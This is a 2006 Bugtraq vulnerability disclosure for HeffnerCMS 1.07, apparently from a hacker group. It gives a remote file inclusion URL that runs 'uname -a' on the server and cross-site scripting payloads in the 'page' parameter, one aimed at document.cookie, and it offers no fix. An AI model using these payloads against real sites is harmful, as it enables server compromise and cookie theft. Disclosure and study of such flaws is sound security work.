HeffnerCMS Remote Command Exucetion And Cross Scripting Attack
Date: 24 Mar 2006 17:47:26 -0000
From: botan@linuxmail.org
To: bugtraq@securityfocus.com
Subject: HeffnerCMS Remote Command Exucetion And Cross Scripting Attack
X-Virus-Scanned: antivirus-gw at tyumen.ru
Website : http://www.christian-heffner.de
Version : 1.07
I.
<?php
$filename="index.php";
require_once 'vlib/vlibTemplate.php';
$tmpl = new vlibTemplate('tmpl/std/index.tpl');
require_once 'config/db_config.php';
require_once 'config/pcfunctions.php';
Ucuyor.... :) lol
II. Vulnerable code ;
http://www.site.com/index.php?page=evilcode.txt?&cmd=uname -a
III. Cross Scripting Attack
http://www.site.com/index.php?page=<script>alert(document.cookie)</script>
http://www.site.com/index.php?page=<script>alert(Patriotic Hackers)</script>
Etc..
IV. Solution
No
Greetz ; B3g0k,Azad,Nistiman,Hawar,Seyh and other our friends..
irc.gigachat.net #kurdhack
www.PatrioticHackers
